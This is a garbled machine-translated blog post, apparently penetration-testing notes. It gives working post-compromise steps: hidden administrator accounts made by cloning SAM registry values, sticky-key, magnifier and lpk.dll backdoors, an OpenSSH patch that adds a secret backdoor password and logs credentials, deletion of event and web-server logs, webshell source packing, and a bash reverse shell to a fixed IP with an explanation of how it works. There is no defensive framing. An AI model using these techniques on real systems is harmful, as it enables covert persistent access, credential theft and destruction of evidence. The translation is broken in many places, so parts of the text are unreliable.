Network Security (penetration Thirteen)

windows

  1. User accounts back door
    NET the User
    NET the User AA / the Add
    NET localgroup of the Administrators A / the Add
    My Computer - Manage - local user groups, right-click the user created after setting a password
    to open the registry regedit, select SAM, everyone permission to add a complete control
    looking at an administrator's name, and the corresponding type names 0x1f4,
    and then find the binary value of the administrator, select all copy
    the same operation, find the user-created, the administrator of the binary value attached to create their own
    Finally, the set of everyone permission to delete


    net user guest /active:yes
    net user guest 123.com
    net localgroup administrators guest /add


    Hide account:
    move support_388945a0 the user
    computer - management - user - password support_388945a0
    right click Properties - Dial - allows remote access

    My Computer - Manage - local users group, created after the user's password right-click
    to open the registry regedit, select SAM, everyone permission to add a complete control
    to find the name of the Administrator, as well as the corresponding type names 0x1f4,
    to find binary value administrator, the name for the f table Select All to copy
    the same operation, find support_388945a0, the administrator of the binary value attached to support_388945a0
    Finally, delete everyone permission settings

    My computer - Properties - open the Remote Desktop

  2. lpk back door
    after creating a user
    using the lpk generate a file lpk.dll
    then lpk.dll system32 files to the target server among
    the 3389 target on the connection page, press five times to bring up the adhesive shift key
    and then press the button to set a good, enter the password to start the program

  3. Trojan backdoor
    dream era

Clear signs - Computer - Manage
Event Viewer - Security - right click Clear All Events

iis Manager - Access Web Site Properties - Logging Properties
Log File Properties - My Computer to open, compared to remove access to records

linux

  1. Backdoor
    two tools to decompress after uploaded
    tar zxvf OpenSSH 5.9p 1.tar.gz-
    tar zxvf 0x06-OpenSSH 5.9p 1.patch.tar.gz-
    cd-5.9p1.path OpenSSH /
    cp sshbd5.9p1.diff ... / OpenSSH-5.9p1
    CD ... / 5.9p1 OpenSSH-
    Patch <backdoor path // sshbd5.9p1.diff

    vi includes.h // modify backdoor password, log file location
    / *
    + # the DEFINE ILOG "/ tmp / ILOG /" // log on to the machine records the user name and password
    + # define OLOG "/ tmp / olog" // Record Log on to the remote user name and password
    + # define SECRETPW "123456" // backdoor password
    * /

    yum install -y openssl openssl-devel pam-devel
    ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

    // If you have problems installing zlib
    // yum -y install zlib zlib -devel

    the make install && the make
    Service // restart sshd restart sshd
    landing ssh

Clear traces
var / log / the httpd / access_log
etc / the httpd / Loga / access_log

直接修改文件,将ip 访问的网站全部改掉
vim var/log/httpd/access_log

Source package

asp 源码打包生成HSH.mdb
在木马的同一级目录下访问HSH.mdb,进行下载
在本地访问用于打包的马进行解包

php源码打包  nosafe.php马 在根目录下最下方有全选
然后选择压缩

Tuoku:
Data Management - off Cooma


Rebound shell.

echo “bash -i >& /dev/tcp/192.168.31.237/4444 0>&1” | bash

bash -i: bash is a common Linux shell, -i parameter indicates generate an interactive shell

/dev/tcp/192.168.175.134/8080: / dev / tcp | udp / ip / port is a special Linux in a file, if the access on Linux will find this file does not exist, its meaning is to host and establish a target host ip tcp or udp port connection on port

0> & 1: 0 standard input standard output 1 to output redirection. Or may be understood, the standard input and standard output 0 1 combined, to redirect 1, because 1 has already been redirected to the standard output /dev/tcp/192.168.175.134/8080, so now the standard input and standard output 0 1 point /dev/tcp/192.168.175.134/8080.
echo + | bash is the intermediate conduit having an interactive shell by imparting bash


shift back door
will be C: \ WINDOWS \ system32 \ dllcache \ sethc.exe delete this folder placed the cache, if not deleted automatically change back.

Delete the C: \ sethc.exe file WINDOWS \ system32 \ under.

Rename the C: \ cmd.exe WINDOWS \ system32 \ under is sethc.exe.

Press the 5 DOS window to pop up the next shift administrative privileges.


Magnifying glass back door

Creating magnify.bat

@echo off
net user administrator$ woaijiushi /add
net localgroup administrators hack$ /add
%Windir%\system32\nagnify.exe
exit

Bat2com using other tools to convert the file into exe Bat file
generated magnify.exe respectively replace C: \ WINDOWS \ system32 \ magnify.exe C and under dllcache: \ WINDOWS \ system32 magnify.exe under \

By calling + U key combination Win landing.

Published 17 original articles · won praise 2 · Views 3516

Guess you like

Origin blog.csdn.net/Aidang/article/details/104474845